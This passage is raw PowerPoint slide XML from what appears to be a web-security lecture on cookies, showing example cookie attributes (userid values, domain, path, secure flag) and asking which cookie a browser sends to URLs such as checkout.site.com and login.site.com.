                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>u2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-40" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>.site.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>path </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>non-secure</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A67B09B5-7C23-014B-A5A2-2079F628E9C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="945515" y="4734696"/>
            <a:ext cx="3436620" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="9525" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="134500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://checkout.site.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://login.site.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>http://othersite.com/</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="object 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B39325FE-5966-444A-A2A1-8E7DE328BCAF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4907915" y="4724400"/>
            <a:ext cx="4007485" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="135890" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1070"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-15" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid=u2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPts val="3900"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="250"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u1,</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-95" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=u2  cookie:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B050"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>none</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="88333639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CCAC4F-C84F-1C4D-81B0-7EEE7DE17BE4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Cookie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{48FB4DFC-203C-854F-99FE-40D0AADA1854}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-CN" dirty="0"/>
              <a:t>Examples: Which cookie to send?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="object 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273106CD-1E75-CB46-AF77-CBEADD7F376F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946800" y="4734000"/>
            <a:ext cx="3436620" cy="1498600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="9525" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="12700" marR="5080">
              <a:lnSpc>
                <a:spcPct val="134500"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="75"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://checkout.site.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>http://login.site.com/ </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://login.site.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="251E06"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="object 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2A3A38F4-1640-6945-A75B-721130E08192}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="943200" y="2275200"/>
            <a:ext cx="3768725" cy="2228400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26034" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>name </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>value </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>u1</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>domain </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-35" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>login.site.com</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="00B0F0"/>
              </a:solidFill>
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725" marR="2486660">
              <a:lnSpc>
                <a:spcPts val="2850"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="105"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>path </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-80" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="B99820"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>secure</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="object 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4B78CBF-CA73-4841-81F8-6E0189C68A5D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5104800" y="2275200"/>
            <a:ext cx="3000375" cy="2228400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="9524">
            <a:solidFill>
              <a:srgbClr val="00B050"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="0" tIns="26034" rIns="0" bIns="0" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2865"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="204"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-5" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" spc="-10" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="2400" u="heavy" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
                <a:uFill>
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:uFill>
                <a:latin typeface="Tahoma"/>
                <a:cs typeface="Tahoma"/>
              </a:rPr>
              <a:t>2</a:t>
            </a:r>
            <a:endParaRPr sz="2400" dirty="0">
              <a:latin typeface="Tahoma"/>
              <a:cs typeface="Tahoma"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="85725">
              <a:lnSpc>
                <a:spcPts val="2850"/>
